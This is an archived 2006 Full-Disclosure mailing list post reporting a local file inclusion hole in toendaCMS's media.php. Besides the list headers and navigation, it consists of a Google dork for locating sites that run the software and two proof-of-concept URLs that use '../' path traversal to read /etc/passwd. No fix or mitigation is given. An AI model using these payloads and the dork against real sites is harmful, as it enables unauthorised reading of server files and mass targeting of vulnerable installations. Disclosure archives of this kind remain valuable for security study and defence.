[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] (no subject)

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] (no subject)
From: "MoHaJaLi" <mohajali2k4@xxxxxxxxx>
Date: Sat, 23 Sep 2006 13:45:58 -0700

Local File Include in  toendaCMS.

Vulnerable File : media.php

googleDork: "Powered by  toendaCMS "

PoC:
 

http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd

 or 

http://site.com/ 
media.php?album=../../../../../../../../../../../../..&key=/etc/passwd

_____

Found By MoHaJaLi

Greetz to Eddy_BAck0o

_____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] MSN (or should that be "msn") goofs again
Next by Date: [Full-disclosure] Local File Inclusion : Kietu
Previous by thread: [Full-disclosure] (no subject)
Next by thread: [Full-disclosure] (no subject)
Index(es):
- Date
- Thread